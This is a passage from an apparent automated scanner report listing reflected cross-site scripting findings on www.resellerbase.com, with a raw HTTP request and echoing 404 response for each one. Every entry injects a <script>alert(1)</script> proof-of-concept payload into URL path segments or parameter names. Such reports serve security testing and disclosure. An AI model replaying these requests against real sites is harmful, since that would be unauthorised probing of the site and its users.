Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmosc0efe<script>alert(1)</script>fd472053f89/images/ was not found on this server.</p>
...[SNIP]...

2.854. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4e71<script>alert(1)</script>4e319c7c4d0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/imagesc4e71<script>alert(1)</script>4e319c7c4d0/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/imagesc4e71<script>alert(1)</script>4e319c7c4d0/ was not found on this server.</p>
...[SNIP]...

2.855. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c179f<script>alert(1)</script>c6fdae497e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/?c179f<script>alert(1)</script>c6fdae497e0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/?c179f<script>alert(1)</script>c6fdae497e0=1 was not found on this server.</p>
...[SNIP]...

2.856. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b0ee4<script>alert(1)</script>73ab919bacc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailb0ee4<script>alert(1)</script>73ab919bacc/10/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailb0ee4<script>alert(1)</script>73ab919bacc/10/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.857. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fb055<script>alert(1)</script>ce7996a6c2a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10fb055<script>alert(1)</script>ce7996a6c2a/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10fb055<script>alert(1)</script>ce7996a6c2a/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.858. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fa23<script>alert(1)</script>250f6086de5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes2fa23<script>alert(1)</script>250f6086de5/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes2fa23<script>alert(1)</script>250f6086de5/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.859. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 87394<script>alert(1)</script>fb272d71d54 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos87394<script>alert(1)</script>fb272d71d54/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos87394<script>alert(1)</script>fb272d71d54/images/rating/ was not found on this server.</p>
...[SNIP]...

2.860. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 92f84<script>alert(1)</script>df7cfab2eb2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images92f84<script>alert(1)</script>df7cfab2eb2/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images92f84<script>alert(1)</script>df7cfab2eb2/rating/ was not found on this server.</p>
...[SNIP]...

2.861. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 5aff5<script>alert(1)</script>e544781f145 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating5aff5<script>alert(1)</script>e544781f145/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating5aff5<script>alert(1)</script>e544781f145/ was not found on this server.</p>
...[SNIP]...

2.862. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 145b7<script>alert(1)</script>6b39b368ca4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/?145b7<script>alert(1)</script>6b39b368ca4=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/?145b7<script>alert(1)</script>6b39b368ca4=1 was not found on this server.</p>
...[SNIP]...

2.863. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6adf9<script>alert(1)</script>392ba4593f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail6adf9<script>alert(1)</script>392ba4593f9/10/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail6adf9<script>alert(1)</script>392ba4593f9/10/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.864. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload fe6a3<script>alert(1)</script>70f0c93386e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10fe6a3<script>alert(1)</script>70f0c93386e/themes/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10fe6a3<script>alert(1)</script>70f0c93386e/themes/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.865. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2d8da<script>alert(1)</script>4a06d498cac was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes2d8da<script>alert(1)</script>4a06d498cac/kosmos/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes2d8da<script>alert(1)</script>4a06d498cac/kosmos/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.866. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3608c<script>alert(1)</script>2303fd9c4df was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos3608c<script>alert(1)</script>2303fd9c4df/images/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:24:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos3608c<script>alert(1)</script>2303fd9c4df/images/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.867. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b01f9<script>alert(1)</script>e204ad6d230 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/imagesb01f9<script>alert(1)</script>e204ad6d230/rating/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/imagesb01f9<script>alert(1)</script>e204ad6d230/rating/2half.gif was not found on this server.</p>
...[SNIP]...

2.868. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 374bf<script>alert(1)</script>73fd10304ef was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating374bf<script>alert(1)</script>73fd10304ef/2half.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating374bf<script>alert(1)</script>73fd10304ef/2half.gif was not found on this server.</p>
...[SNIP]...

2.869. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 300e5<script>alert(1)</script>a07338ec638 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/2half.gif300e5<script>alert(1)</script>a07338ec638 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/2half.gif300e5<script>alert(1)</script>a07338ec638 was not found on this server.</p>
...[SNIP]...

2.870. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/2half.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/2half.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d8a5e<script>alert(1)</script>e494879d5c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/images/rating/2half.gif?d8a5e<script>alert(1)</script>e494879d5c9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:23:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/images/rating/2half.gif?d8a5e<script>alert(1)</script>e494879d5c9=1 was not found on this server.</p>
...[SNIP]...

2.871. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea134<script>alert(1)</script>eff89dd9700 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailea134<script>alert(1)</script>eff89dd9700/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailea134<script>alert(1)</script>eff89dd9700/10/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.872. http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c35a<script>alert(1)</script>0fa9bf857ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/102c35a<script>alert(1)</script>0fa9bf857ec/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
